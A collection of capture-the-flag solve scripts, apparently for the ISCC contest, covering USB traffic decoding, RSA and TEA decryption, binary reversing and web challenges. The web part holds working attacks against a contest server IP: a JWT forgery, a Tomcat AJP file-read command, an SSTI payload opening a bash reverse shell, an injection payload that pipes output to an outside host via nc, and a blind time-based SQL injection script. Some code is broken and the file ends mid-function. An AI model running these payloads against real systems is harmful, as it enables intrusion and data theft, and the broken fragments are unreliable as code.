from openpyxl import load_workbook
from openpyxl.styles import PatternFill

wb = load_workbook('C:\\Users\\admin\\Downloads\\attachment-1.xlsx')
ws = wb.active

bold_cells = []
for row in ws.iter_rows():
    for cell in row:
        if cell.font.bold:
            bold_cells.append(cell.coordinate)

highlight_style = PatternFill(start_color="FFFF00", end_color="FFFF00", fill_type="solid")

for cell in bold_cells:
    ws[cell].fill = highlight_style

wb.save('ll.xlsx')
print('加粗的单元格已设置为高亮并保存到 highlighted_excel_file.xlsx 文件中。')

f=open('D:\\流量\\attachment-27(1)\\usbdata.txt','r')
fi=open('out.txt','w')
while 1:
    a=f.readline().strip()
    if a:
        if len(a)==16: # 鼠标流量的话len改为8
            out=''
            for i in range(0,len(a),2):
                if i+2 != len(a):
                    out+=a[i]+a[i+1]+":"
                else:
                    out+=a[i]+a[i+1]
            fi.write(out)
            fi.write('\n')
    else:
        break

fi.close()

mappings = { 0x04:"A",  0x05:"B",  0x06:"C", 0x07:"D", 0x08:"E", 0x09:"F", 0x0A:"G",  0x0B:"H", 0x0C:"I",  0x0D:"J", 0x0E:"K", 0x0F:"L", 0x10:"M", 0x11:"N",0x12:"O",  0x13:"P", 0x14:"Q", 0x15:"R", 0x16:"S", 0x17:"T", 0x18:"U",0x19:"V", 0x1A:"W", 0x1B:"X", 0x1C:"Y", 0x1D:"Z", 0x1E:"1", 0x1F:"2", 0x20:"3", 0x21:"4", 0x22:"5",  0x23:"6", 0x24:"7", 0x25:"8", 0x26:"9", 0x27:"0", 0x28:"\n", 0x2a:"[DEL]",  0X2B:"    ", 0x2C:" ",  0x2D:"-", 0x2E:"=", 0x2F:"[",  0x30:"]",  0x31:"\\", 0x32:"~", 0x33:";",  0x34:"'", 0x36:",",  0x37:"." }

nums = []
keys = open('out.txt')
for line in keys:
    if line[0]!='0' or line[1]!='0' or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0':
         continue
    nums.append(int(line[6:8],16))

keys.close()

output = ""
for n in nums:
    if n == 0 :
        continue
    if n in mappings:
        output += mappings[n]
    else:
        output += '[unknown]'

print ('output :\n' + output)

#PR3550NWARDSA2FEE6E0
#pr3550nwardsa2fee6e0
import time,os
num=34
a=os.listdir("./%s"%num)
t=1728864000
b=""
for i in range(18):
    mtime = time.localtime(os.path.getmtime("./%s/.%s.txt"%(num,i)))
    mtime=int(time.mktime(time.strptime(time.strftime('%Y-%m-%d %H:%M:%S', mtime), "%Y-%m-%d %H:%M:%S")))
    b+=chr(mtime-t)
print("ISCC{%s}"%b)
input()

f1 = open('left_foot_invert.png','rb')
f2 = open('left_hand_invert.png','rb')
f3 = open('right_foot_invert.png','rb')
f4 = open('right_hand_invert.png','rb')
f5 = open('1.zip','wb')
for i in range(3176):
    f5.write(f1.read(1))
    f5.write(f2.read(1))
    f5.write(f3.read(1))
    f5.write(f4.read(1))
f5.write(f1.read(1))

from Crypto.Util.number import long_to_bytes,bytes_to_long
import gmpy2
e = 65537
n = 16920251144570812336430166924811515273080382783829495988294341496740639931651
p = 100882503720822822072470797230485840381
q = 167722355418488286110758738271573756671
phi = (p-1)*(q-1)
d = gmpy2.invert(e,phi)
c = bytes_to_long(open('true_flag.jpeg','rb').read())
m = pow(c,d,n)
print(long_to_bytes(m))

from acoustic_keylogger.audio_processing import wav_read, detect_keystrokes, extract_features
from sklearn.preprocessing import MinMaxScaler
import itertools

# Load audio data from the provided file
audio_data = wav_read("./attachment-45.wav")

# Detect individual keystrokes within the audio data
detected_keystrokes = detect_keystrokes(audio_data, sample_rate=48000)

# Extract features from each detected keystroke
features_list = [extract_features(keystroke) for keystroke in detected_keystrokes]

# Normalize the feature data
scaler = MinMaxScaler()
normalized_features = scaler.fit_transform(features_list)

# Create a mapping of unique feature sets to alphabets
letter_mapping = {}
current_alphabet_code = ord('a')
encoded_phrase = []
for feature_set in normalized_features:
    if feature_set[0] not in letter_mapping:
        letter_mapping[feature_set[0]] = current_alphabet_code
        current_alphabet_code += 1
    encoded_phrase.append(letter_mapping[feature_set[0]])

# Convert the numeric representation back to characters
encoded_flag = ''.join(chr(code) for code in encoded_phrase)

# Define the set of possible characters for permutation
char_options = '01268acdef'

# Check for permutations that result in a valid flag
for char_permutation in itertools.permutations(char_options, 9):
    char_translation = {
        'a': '4', 'b': '9', 'c': '5', 'd': '3', 'e': '7', 'f': 'b',
        'g': char_permutation[0], 'h': char_permutation[1], 'i': char_permutation[2],
        'j': char_permutation[3], 'k': char_permutation[4], 'l': char_permutation[5],
        'm': char_permutation[6], 'n': char_permutation[7], 'o': char_permutation[8]
    }
    
    try:
        # Translate the encoded flag using the current permutation
        translated_hex = ''.join(char_translation.get(char, '?') for char in encoded_flag)
        flag_bytes = bytes.fromhex(translated_hex)
        
        # Validate the flag criteria
        if flag_bytes.endswith(b'}') and b'human' in flag_bytes and b'she' in flag_bytes and b'is' in flag_bytes:
            print(flag_bytes)
    except ValueError:  # Catch hexadecimal conversion errors silently
        continue

import base64
from urllib.parse import unquote
from Crypto.Util.number import long_to_bytes, bytes_to_long
from Crypto.PublicKey import RSA

# RSA公钥和私钥定义
pubkey_str = """-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCK/qv5P8ixWjoFI2rzF62tm6sDFnRsKsGhVSCuxQIxuehMWQLmv6TPxyTQPefIKufzfUFaca/YHkIVIC19ohmE5X738TtxGbOgiGef4bvd9sU6M42k8vMlCPJp1woDFDOFoBQpr4YzH4ZTR6Ps+HP8VEIJMG5uiLQOLxdKdxi41QIDAQAB
-----END PUBLIC KEY-----
"""

prikey_str = """-----BEGIN PRIVATE KEY-----
MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAIr+q/k/yLFaOgUjavMXra2bqwMWdGwqwaFVIK7FAjG56ExZAua/pM/HJNA958gq5/N9QVaca/YHkIVIC19ohmE5X738TtxGbOgiGef4bvd9sU6M42k8vMlCPJp1woDFDOFoBQpr4YzH4ZTR6Ps+HP8VEIJMG5uiLQOLxdKdxi41AgMBAAECgYBDsqawT5DAUOHRft6oZ+//jsJMTrOFu41ztrKkbPAUqCesh+4R1WXAjY4wnvY1WDCBN5CNLLIo4RPuli2R81HZ4OpZuiHv81sNMccauhrJrioDdbxhxbM7/jQ6M9YajwdNisL5zClXCOs1/y01+9vDiMDk0kX8hiIYlpPKDwjqQQJBAL6Y0fuoJng57GGhdwvN2c656tLDPj9GRi0sfeeMqavRTMz6/qea1LdAuzDhRoS2Wb8ArhOkYns0GMazzc1q428CQQC6sM9OiVR4EV/ewGnBnF+0p3alcYr//Gp1wZ6fKIrFJQpbHTzf27AhKgOJ1qB6A7P/mQS6JvYDPsgrVkPLRnX7AkEAr/xpfyXfB4nsUqWFR3f2UiRmx98RfdlEePeo9YFzNTvX3zkuo9GZ8e8qKNMJiwbYzT0yft59NGeBLQ/eynqUrwJAE6Nxy0Mq/Y5mVVpMRa+babeMBY9SHeeBk22QsBFlt6NT2Y3Tz4CeoH547NEFBJDLKIICO0rJ6kF6cQScERASbQJAZy088sVY6DJtGRLPuysv3NiyfEvikmczCEkDPex4shvFLddwNUlmhzml5pscIie44mBOJ0uX37y+co3q6UoRQg==
-----END PRIVATE KEY-----
"""

# 导入RSA公钥与私钥
pubkey = RSA.import_key(pubkey_str)
prikey = RSA.import_key(prikey_str)

# 定义Base64替换规则
base64_replacements = {
    "/": "e5Lg^FM5EQYe5!yF&62%V$UG*B*RfQeM",
    "+": "n6&B8G6nE@2tt4UR6h3QBt*5&C&pVu8W",
    "=": "JXWUDuLUgwRLKD9fD6&VY2aFeE&r@Ff2"
}

# 替换Base64编码中的字符
def custom_base64_replace(b64_str):
    for original, replacement in base64_replacements.items():
        b64_str = b64_str.replace(original, replacement)
    return b64_str

# 反向替换Base64编码中的字符
def reverse_custom_base64_replace(b64_str):
    for replacement, original in base64_replacements.items():
        b64_str = b64_str.replace(replacement, original)
    return b64_str

# 加密函数
def encrypt(plaintext):
    encrypted_chunks = []
    for i in range(0, len(plaintext), 128):
        chunk = plaintext[i:i+128]
        encrypted_chunk = pow(bytes_to_long(chunk), prikey.d, pubkey.n)
        encrypted_chunks.append(long_to_bytes(encrypted_chunk))
    encrypted_data = b''.join(encrypted_chunks)
    encoded_data = custom_base64_replace(base64.b64encode(encrypted_data).decode())
    return encoded_data

# 解密函数
def decrypt(ciphertext_url_encoded):
    ciphertext_url_decoded = unquote(ciphertext_url_encoded)
    ciphertext_decoded = reverse_custom_base64_replace(ciphertext_url_decoded)
    ciphertext_data = base64.b64decode(ciphertext_decoded)
    decrypted_chunks = []
    for i in range(0, len(ciphertext_data), 128):
        chunk = ciphertext_data[i:i+128]
        decrypted_chunk = pow(bytes_to_long(chunk), pubkey.e, pubkey.n)
        decrypted_chunks.append(long_to_bytes(decrypted_chunk))
    decrypted_text = b''.join(decrypted_chunks)
    return decrypted_text

# 主程序
if __name__ == '__main__':
    ciphertext = "Ie5Lg^FM5EQYe5!yF&62%V$UG*B*RfQeM...[省略的长字符串]..."
    print(f"加密数据: {ciphertext}")

    decrypted_text = decrypt(ciphertext)
    print(f"解密数据: {decrypted_text}")

import re

# 定义文件路径
input_file_path = r'D:\流量\1.txt'
output_file_path = r'D:\流量\2.txt'

# 读取并解析域名
with open(input_file_path, 'r') as file:
    lines = file.readlines()
domains = [
    re.sub(r'\.microsofto365\..*', '111', line)
    for line in lines
]

clean_domains = [
    match.group(1)[18:].replace('.', '')
    for domain in domains
    if (match := re.search(r'Name: (.*?)111', domain))
]

# 转换为字符串
decoded_word = ''.join(
    chr(int(substring, 16) for domain in clean_domains for i in range(0, len(domain), 2) for substring in (domain[i:i+2])
)

# 写入到文件
with open(output_file_path, 'w') as file:
    file.write(decoded_word)

x='FSBBhKhLgEdDDKeidOpktsBNRI6'#输入比较的字符
W='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
w='abcdefghijklmnopqrstuvwxyz'
M='0123456789+/-=!#&*()?;:*^%'
v='DABBZXQESVFRWNGTHYJUMKIOLPC'
for i in range(len(x)):
    for j in range(32,127):
        if j-ord(v[i])<=0:
            pass
        else:
            v22=j-ord(v[i])
            if v22>25:
                if v22>51:
                    v1=M[v22-52]
                else:
                    v1=w[v22-26]
                if v1==x[i]:
                    print(chr(j),end='')
            else:
                if W[v22]==x[i]:
                    print(chr(j),end='')

from Crypto.Util.number import *


def shift(z, y, x, k, p, e):
    return ((((z >> 5) ^ (y << 2)) + ((y >> 3) ^ (z << 4))) ^ ((x ^ y) + (k[(p & 3) ^ e] ^ z)))


def encrypt(v, k):
    delta = 0x61C88647
    n = len(v)
    rounds = 6 + 52 // n
    x = 0
    z = v[n - 1]
    for i in range(rounds):
        x = (x - delta) & 0xFFFFFFFF
        e = (x >> 2) & 3
        for p in range(n - 1):
            y = v[p + 1]
            v[p] = (v[p] + shift(z, y, x, k, p, e)) & 0xFFFFFFFF
            z = v[p]
        p += 1
        y = v[0]
        v[n - 1] = (v[n - 1] + shift(z, y, x, k, p, e)) & 0xFFFFFFFF
        z = v[n - 1]
    return v


def decrypt(v, k):
    delta = 0x61C88647
    n = len(v)
    rounds = 6 + 52 // n
    x = (0 - rounds * delta) & 0xFFFFFFFF
    y = v[0]
    for i in range(rounds):
        e = (x >> 2) & 3
        for p in range(n - 1, 0, -1):
            z = v[p - 1]
            v[p] = (v[p] - shift(z, y, x, k, p, e)) & 0xFFFFFFFF
            y = v[p]
        p -= 1
        z = v[n - 1]
        v[0] = (v[0] - shift(z, y, x, k, p, e)) & 0xFFFFFFFF
        y = v[0]
        x = (x + delta) & 0xFFFFFFFF
    return v


if __name__ == '__main__':
    plain = [0xE2122B60, 0x6A5F5FB9, 0x8B00D411, 0x85672DCF, 0xCA65C318, 0x2757DF85]  # 输入比较的字符
    key = [0x12345678, 0x9ABCDEF0, 0xFEDCBA98, 0x76543210]
    decrypted = decrypt(plain, key)
    flag = []
    v16 = '674094872038771148666737'

    for i in range(len(plain)):
        x = long_to_bytes(decrypted[i])
        for j in range(3, -1, -1):
            flag.append(x[j])

    for i in range(len(flag)):
        flag[i] ^= ord(v16[i]) - 0x30
        if i % 2:
            flag[i] -= 2
        else:
            flag[i] += 3

    print(bytes(flag))

cmp = [0,16,56,114,10,5,116,43,27,25,20,3,67,109,83,89,70,84,64,103,116,125,80,64]
with open(r"D:\流量\attachment-7\BEIXUAN-8.exe", "rb") as f:
    tmp = f.read()
    if tmp[0:3] == b'\x4d\x5a\x50':
        start = 0x0b3614 + 0xcc8
    else:
        start = 0xcc8
    cmp = [tmp[start + i * 10] for i in range(24)]
inp1 = cmp[:12]
v7 = cmp[12:]
v4 = [2, 0, 3, 1, 6, 4, 7, 5, 10, 8, 11, 9]
inp2 = [0] * 12
for i in range(len(inp2)):
    inp2[i] = v7[v4[i]]

key = 'ISCC'
for i in range(len(inp1)):
    inp1[i] ^= ord(key[i % len(key)])

for i in range(len(inp1)):
    print(chr(inp1[i]) + chr(inp2[i]), end='')

cmp = []
with open(r"D:\流量\cryptic.exe", 'rb') as f:
    tmp = f.read()
    cmp += tmp[0x1210 + 2:0x1210 + 2 + 8]
    cmp += tmp[0x121e + 2:0x121e + 2 + 8]
    cmp += tmp[0x122c + 2:0x122c + 2 + 8]
    cmp[22:28] = tmp[0x123a + 4:0x123a + 4 + 4]
key1 = 'So--this-is-the-right-flag'
key1_ = []
key2 = 'ISCC'

for i in range(len(cmp)):
    cmp[i] -= 10
    cmp[i] &= 0xff

for i in range(len(cmp) - 1):
    cmp[i] += cmp[i + 1]
    cmp[i] &= 0xff

for i in range(len(cmp) - 1):
    cmp[i] ^= ord(key2[2])

for i in range(0, len(cmp), 2):
    cmp[i] ^= ord(key2[i % 4])

for i in range(len(cmp) // 2):
    cmp[i], cmp[26 - i - 1] = cmp[26 - i - 1], cmp[i]

for i in range(len(cmp) // 2):
    cmp[i], cmp[26 - i - 1] = cmp[26 - i - 1], cmp[i]

for i in range(len(cmp)):
    cmp[i] += ord(key2[i % 4])
    cmp[i] &= 0xff

print(bytes(cmp))

import string


table="冻笔新诗懒写寒炉美酒时温醉看墨花月白恍疑雪满前村"
tmp=open(r"E:\QQsavefile\winterbegins (1).exe","rb").read()[0x1c98d:0x1c98d+2*140].decode('gbk',errors="ignore")
enc=tmp[:tmp.index('\x00')]
enc=''.join([''.join(enc[i+1:i-1:-1]) for i in range(len(enc)-1,-1,-2)])
tmp=[table.find(i)//2 for i in enc[0::2]]
it=iter(tmp)
listchar=[]
for i in it:
    if i==11:
        listchar.append(chr(next(it)+61))
    else:
        listchar.append(chr(i+48))
tmpflag=list(''.join(map(lambda x:chr(int(x,16)),map(lambda x,y:x+y,listchar[::2],listchar[1::2]))))
print(''.join(tmpflag))
while sum([ i-1  for i in range(len(tmpflag)) if tmpflag[i] in string.digits])>0:
    index=[ i-1  for i in range(len(tmpflag)) if tmpflag[i] in string.digits][0]
    tmpflag=tmpflag[:index]+[tmpflag[index]]*int(tmpflag[index+1])+tmpflag[index+2:]
print(''.join(tmpflag))

import os
def fib(n):
     a,b = 0,1
     lis = []
     for i in range(n):
         a,b =b,a+b
         lis.append(a)
     return lis
with open([i for i in os.listdir(os.getcwd()) if i.startswith("code_book")][0],"r") as file:
     data = file.read()
     file.close()

target = fib(20)
assert target[-1] > len(data)
print(f"ISCC{{{''.join([data[i - 1] if i < len(data) else '' for i in
target])}}}")

# pip install torch
# pip install -i https://pypi.tuna.tsinghua.edu.cn/simple torchvision


_7zname = 'AI-20.7z'    # 替换你的路径
offset_str = '123456789012345678901234'
target_base64 = 'TWF/c1sse19GMW5gYVRoWWFrZ3lhd0B9'


import base64
def decrypt(encrypted_base64, offset_str):
    encrypted_bytes = base64.b64decode(encrypted_base64.encode('utf-8'))
    encrypted_str = encrypted_bytes.decode('utf-8')
    decrypted = []
    for i, char in enumerate(encrypted_str):
        offset = int(offset_str[i])
        ascii_val = ord(char) ^ offset
        if i % 2 == 0:
            original_ascii = ascii_val - offset
        else:
            original_ascii = ascii_val + offset
        decrypted_char = chr(original_ascii)
        decrypted.append(decrypted_char)
    return ''.join(decrypted)

key = decrypt(target_base64, offset_str)

# # Key{Y0u_F1nd_The_key_w@}
import py7zr
with py7zr.SevenZipFile(_7zname, mode='r', password=key) as z:
    z.extractall()


import torch  # torch基础库
import torch.nn as nn  # torch神经网络库
import torch.nn.functional as F
import torchvision.transforms as transforms  # 图像处理库
from PIL import Image  # 图像处理库


class Net(nn.Module):
    def __init__(self):
        super(Net, self).__init__()
        self.fc1 = nn.Linear(28 * 28, 128)
        self.fc2 = nn.Linear(128, 64)
        self.fc3 = nn.Linear(64, 10)

    def forward(self, x):
        x = x.view(-1, 28 * 28)
        x = F.relu(self.fc1(x))
        x = F.relu(self.fc2(x))
        x = self.fc3(x)
        return x


model = torch.load("confused_digit_recognition_model.pt")
model.eval()

transform = transforms.Compose(
    [
        transforms.Grayscale(num_output_channels=1),
        transforms.Resize((28, 28)),
        transforms.ToTensor(),
        transforms.Normalize((0.5,), (0.5,)),
    ]
)
dic = {
    "0": "@nd",
    "1": "a!",
    "2": "_",
    "3": "F",
    "4": "SSS",
    "5": "W@",
    "6": "K",
    "7": "1",
    "8": "C",
    "9": "d",
}
flag = []
for i in range(24):
    image = Image.open(str(i + 1) + ".png")
    image = transform(image).unsqueeze(0)  # type:ignore
    output = model(image)
    predicted = torch.argmax(output, dim=1)
    flag.append(predicted.item())
flag = "".join(map(str, flag))
for k, v in dic.items():
    flag = flag.replace(k, v)
print(flag)

import base64

your_hex_string = "".join([chr(get_wide_byte(0x14000BF40+i) ^ 0xc) for i in range(48)])
bytes_object = bytes(bytearray.fromhex(your_hex_string))

decoded_string = base64.b64decode(bytes_object).decode()
print("ISCC{" + decoded_string + "}")

from ctypes import *
import libnum

# Given array of integers
a1 = [
    0xDDA214B5, 0xE5AD9DF4, 0x6AE4F8FF, 0x925B7AF6,
    0xEDCA55A3, 0xED3670CA, 0xA84E71DA, 0x1A910369,
    0x75F6D88B, 0xB6BBC257, 0xC2CAE77B, 0xEFD444CF,
    0x532CCDFB, 0xFA8A2260, 0xDD6B9924, 0xBBCC10E3
]

# Initialize variables
decode = []
v5 = c_uint32(0)
times = 16
delta = 0x9E3779B8

# Process the array in pairs
for j in range(0, len(a1), 2):
    v5.value = delta * 16
    v1 = c_uint32(a1[j])
    v2 = c_uint32(a1[j+1])
    a2 = [i * (j // 2 + 1) for i in [1, 2, 3, 4]]

    # Perform the loop for each pair
    for _ in range(times):
        r8d = c_uint32((v1.value << 5) + a2[2])
        r8d.value ^= (v1.value + v5.value)
        esi = c_uint32((v1.value >> 6) + a2[3])
        edi = c_uint32(esi.value)
        edi.value &= r8d.value
        edi.value *= 2
        v2.value -= r8d.value - edi.value + esi.value

        esi = c_uint32((v2.value << 5) + a2[0])
        r11d = c_uint32(v2.value + v5.value)
        edi = c_uint32(esi.value)
        edi.value &= r11d.value
        esi.value += r11d.value
        edi.value *= 2
        esi.value -= edi.value

        r11d.value = (v2.value >> 6) + a2[1]
        r11d.value ^= esi.value
        v1.value -= r11d.value

        v5.value -= delta

    # Append results to the decode list
    decode.extend([v1.value, v2.value])

# Convert and print the decoded values
decoded_string = ''.join(libnum.n2s(i)[::-1].decode() for i in decode)
print(decoded_string)

f = open(r"D:\\流量\\-20240505.exe",'rb')
f.seek(0x24390)

s = list(f.read(144))
for i in range(12):
    for j in range(12):
        if s[i*12+j]%2:
            print(" ",end="")
        else:
            print("*",end="")
    print()

path = "1122112211110011221"
i = 5
j = 0
print("ISCC{",end="")
for c in path:
    if c == "0":
        print(hex(s[(i-1)*12+j])[2:].zfill(2),end="")
        i-=1
    elif c == "1":
        print(hex(s[(i) * 12 + j+1])[2:].zfill(2), end="")
        j+= 1
    elif c == "2":
        print(hex(s[(i+1) * 12 + j])[2:].zfill(2), end="")
        i+= 1
print("}")

import requests
import json
import urllib.parse

def fetch_expression():
    response = requests.get('http://101.200.138.180:10006/get_expression') # 修改[website]为实际网站地址
    data = json.loads(response.text)
    expression = data['expression']
    return expression

def calculate_expression(expression):
    # 解析unicode并计算结果
    decoded_expression = urllib.parse.unquote(expression)
    sanitized_expression = decoded_expression.replace('×', '*').replace('÷', '/')
    result = eval(sanitized_expression)
    return result

expression = fetch_expression()
result = calculate_expression(expression)
req=requests.get("http://101.200.138.180:10006/crawler?answer="+str(result))
print(req.text)

from json import loads, dumps
from jwcrypto.common import base64url_encode, base64url_decode


def topic(topic):
    """ Use mix of JSON and compact format to insert forged claims including long expiration """
    [header, payload, signature] = topic.split('.')
    parsed_payload = loads(base64url_decode(payload))
    parsed_payload['role'] = "vip"
    fake_payload = base64url_encode(
        (dumps(parsed_payload, separators=(',', ':'))))
    # print(fake_payload)
    return '{"  ' + header + '.' + fake_payload + '.":"","protected":"' + header + '", "payload":"' + payload + '","signature":"' + signature + '"}'

originaltoken ="eyJhbGciOiJQUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MTQ1NTg2NDgsImlhdCI6MTcxNDU1NTA0OCwianRpIjoiRjMzSnFhLTR3Q3BpV3pjV0ZZSE8xQSIsIm5iZiI6MTcxNDU1NTA0OCwicm9sZSI6Im1lbWJlciIsInVzZXJuYW1lIjoiSVNDQ21lbWJlciJ9.S1705RN1AwmC-AlVQxisAMAQXUeeJptacH8yirybmaV5ulcBOxhxOI13QDHdBmA3Iis12WZ61Z6x5Qx8jqecLYR291IPdyrclfRCzh4VPwArS2UYPfWP-dp0mGh-RQDzsFQ4yqgX1M6ArbWtcRpLf9NJqsjdrhJnhSCjAwKOfmpImbDq6A0RYwUxpCylbS7fedSpN14OLId8ZTOJvdtD6vNPTHfG0QWqDdfxhMIJ4K8Cab6G41ltAsrz70DMngUJUT_4ImtjWieM6qpM6OgBT5adzVGtmB1Y6cPlFhlypXHEZcvvZlmRe_FUJ7JysA0eeTOz6ObVQQhVJd0_nFFXNA"
topic = topic(originaltoken)
print(topic)

python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py 101.200.138.180 -p 8009 -f WEB-INF/flag.txt

import functools  
import time  
import requests  
from fenjing import exec_cmd_payload  # 确保这个库存在且可以导入  
  
url = "http://101.200.138.180:16356/evlelLL/646979696775616e"  
headers = {}  # 根据需要定义headers，例如添加User-Agent等  
cookies = {  
    'session': 'eyJhbnN3ZXJzX2NvcnJlY3QiOnRydWV9.ZkQrdg.TTUET5iRTAmIfSy5szAO9ZMgkA'  
}  
  
@functools.lru_cache(1000)  
def waf(payload: str):  
    time.sleep(0.02)  # 防止请求发送过多  
    resp = requests.post(url, headers=headers, cookies=cookies, timeout=10, data={"iIsGod": payload})  
    return "大胆" not in resp.text  
  
if __name__ == "__main__":  
    shell_payload, will_print = exec_cmd_payload(  
        waf, 'bash -c "bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1"'  
    )  
    if not will_print:  
        print("这个payload不会产生回显！")  
    print(f"{shell_payload=}")

from Crypto.Util.Padding import pad
from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b
from Crypto.Random import get_random_bytes
from enum import Enum

class Mode(Enum):
    ECB = 0x01
    CBC = 0x02
    CFB = 0x03

class Cipher:
    def __init__(self, key, iv=None):
        self.BLOCK_SIZE = 64
        self.KEY = [b2l(key[i:i + self.BLOCK_SIZE // 16]) for i in range(0, len(key), self.BLOCK_SIZE // 16)]
        self.DELTA = 0x9e3779b9
        self.IV = iv
        self.ROUNDS = 64
        
        self.mode = Mode.CBC if iv else Mode.ECB
        if iv and len(iv) * 8 != self.BLOCK_SIZE:
            self.mode = Mode.CFB

    def _xor(self, a, b):
        return bytes(_a ^ _b for _a, _b in zip(a, b))

    def encrypt_block(self, msg):
        m0, m1 = b2l(msg[:4]), b2l(msg[4:])
        msk = (1 << (self.BLOCK_SIZE // 2)) - 1
        s = 0
        
        for _ in range(self.ROUNDS):
            s += self.DELTA
            m0 = ((m1 << 4) + self.KEY[_ % len(self.KEY)]) ^ (m1 + s) ^ ((m1 >> 5) + self.KEY[(_ + 1) % len(self.KEY)])
            m1 = ((m0 << 4) + self.KEY[(_ + 2) % len(self.KEY)]) ^ (m0 + s) ^ ((m0 >> 5) + self.KEY[(_ + 3) % len(self.KEY)])
            m0 &= msk
            m1 &= msk
            
        return l2b((m0 << (self.BLOCK_SIZE // 2)) | m1)

    def encrypt(self, msg):
        msg_padded = pad(msg, self.BLOCK_SIZE // 8)
        blocks = [msg_padded[i:i + self.BLOCK_SIZE // 8] for i in range(0, len(msg_padded), self.BLOCK_SIZE // 8)]
        
        ciphertext = b''
        if self.mode == Mode.ECB:
            ciphertext = b''.join(self.encrypt_block(block) for block in blocks)
        elif self.mode == Mode.CBC:
            X = self.IV
            for block in blocks:
                encrypted_block = self.encrypt_block(self._xor(X, block))
                ciphertext += encrypted_block
                X = encrypted_block
        elif self.mode == Mode.CFB:
            X = self.IV
            for block in blocks:
                output = self.encrypt_block(X)
                encrypted_block = self._xor(output, block)
                ciphertext += encrypted_block
                X = encrypted_block
                
        return ciphertext

if __name__ == '__main__':
    KEY = get_random_bytes(16)
    IV = get_random_bytes(8)
    cipher = Cipher(KEY, IV)
    FLAG = b'xxxxxxxxxxxxxxxxxxx'
    ct = cipher.encrypt(FLAG)
    
    print(f'KEY: {KEY.hex()}')
    print(f'IV: {IV.hex()}')
    print(f'Ciphertext: {ct.hex()}')

from Crypto.Util.Padding import pad, unpad
from Crypto.Util.number import bytes_to_long as b2l, long_to_bytes as l2b
from Crypto.Random import get_random_bytes
from enum import Enum

class Mode(Enum):
    ECB = 0x01
    CBC = 0x02
    CFB = 0x03

class Cipher:
    def __init__(self, key, iv=None):
        self.BLOCK_SIZE = 64
        self.KEY = [b2l(key[i:i + self.BLOCK_SIZE // 16]) for i in range(0, len(key), self.BLOCK_SIZE // 16)]
        self.DELTA = 0x9E3779B9
        self.IV = iv
        self.ROUNDS = 64
        
        self.mode = Mode.CBC if iv else Mode.ECB
        if iv and len(iv) * 8 != self.BLOCK_SIZE:
            self.mode = Mode.CFB
            print(f"Mode set to CFB due to IV length mismatch.")
        else:
            print(f"Mode: {self.mode}")

    def _xor(self, a, b):
        """Perform XOR operation on two byte sequences."""
        return bytes(_a ^ _b for _a, _b in zip(a, b))

    def decrypt_block(self, ct):
        """Decrypt a single block."""
        m0, m1 = b2l(ct[:4]), b2l(ct[4:])
        msk = (1 << (self.BLOCK_SIZE // 2)) - 1
        s = self.DELTA * self.ROUNDS
        
        for i in range(self.ROUNDS - 1, -1, -1):
            m1 = ((m0 << 4) + self.KEY[(self.ROUNDS - 1 - i + 2) % len(self.KEY)]) ^ \
                 (m0 + s) ^ \
                 ((m0 >> 5) + self.KEY[(self.ROUNDS - 1 - i + 3) % len(self.KEY)])
            m1 &= msk
            m0 = ((m1 << 4) + self.KEY[(self.ROUNDS - 1 - i) % len(self.KEY)]) ^ \
                 (m1 + s) ^ \
                 ((m1 >> 5) + self.KEY[(self.ROUNDS - 1 - i + 1) % len(self.KEY)])
            m0 &= msk
            s -= self.DELTA
        
        return l2b((m0 << (self.BLOCK_SIZE // 2)) | m1)

    def decrypt(self, ct):
        """Decrypt the ciphertext."""
        blocks = [ct[i:i + self.BLOCK_SIZE // 8] for i in range(0, len(ct), self.BLOCK_SIZE // 8)]
        msg = b""
        
        if self.mode == Mode.ECB:
            msg = b''.join(self.decrypt_block(block) for block in blocks)
        elif self.mode == Mode.CBC:
            X = self.IV
            for ct_block in blocks:
                decrypted_block = self._xor(X, self.decrypt_block(ct_block))
                msg += decrypted_block
                X = ct_block
        elif self.mode == Mode.CFB:
            X = self.IV
            for ct_block in blocks:
                output = self.encrypt_block(X)  # Assuming encrypt_block exists for CFB mode
                decrypted_block = self._xor(output, ct_block)
                msg += decrypted_block
                X = ct_block
                
        return unpad(msg, self.BLOCK_SIZE // 8)

if __name__ == "__main__":
    KEY = bytes.fromhex("3362623866656338306539313238353733373566366338383563666264386133")
    IV = bytes.fromhex("64343537373337663034346462393931")
    cipher = Cipher(KEY, IV)
    ct = bytes.fromhex("1cb8db8cabe8edbbddb211f3da4869cdee3bcfb850bce808")
    print(f"FLAG: {cipher.decrypt(ct)}")

from random import randint

import requests

# payload = "union"
payload = """','')/*%s*/returning(1)as"\\'/*",(1)as"\\'*/-(a=`child_process`)/*",(2)as"\\'*/-(b=`/printFlag|nc 121.43.127.41 3333`)/*",(3)as"\\'*/-console.log(process.mainModule.require(a).exec(b))]=1//"--""" % (
            ' ' * 1024 * 1024 * 16)
username = str(randint(1, 65535)) + str(randint(1, 65535)) + str(randint(1, 65535))
data = {
    'username': username + payload,
    'password': 'AAAAAA'
}
print('ok')
r = requests.post('http://xxxxxx:[port]/register_7D85tmEhhAdgGu92', data=data)
print(r.content.decode('utf-8'))

import requests
import string
import time

def time_inject(condition):
url = "http://101.200.138.180:8003/inquiry/" headers = {}
cookies = { "csrftoken":"",#自己的
          }
data={csrfmiddlewaretoken": "",# 填自己的
     "sel_value": "name", "nick_name": f'name",(case  when({condition})                                      randomblob(1000000000) else 0 end),"1'
     }
while True:
    try:
        start = time.time()
        response = requests.post(url,headers=headers,cookies=cookies,data=data)
        end = time.time()
        time_cost = end - start
        print("time cost: ", time_cost)
        if time_cost > 3:
            return True
        else:
            return False
        except:
            continue

def get_length(var_name):
    for i in range(1, 1000):
        if time_inject(f"length({var_name})={i}"):
            return i

def get_char(var_name, index):
    alphabet = string.printable
    for c in alphabet:
        if time_inject(f"substr({var_name},{index},1)='{c}'"):
            return c
        
def get_value(var_name, length):
    for i in range(1, length + 1):
        char = get_char(var_name, i)
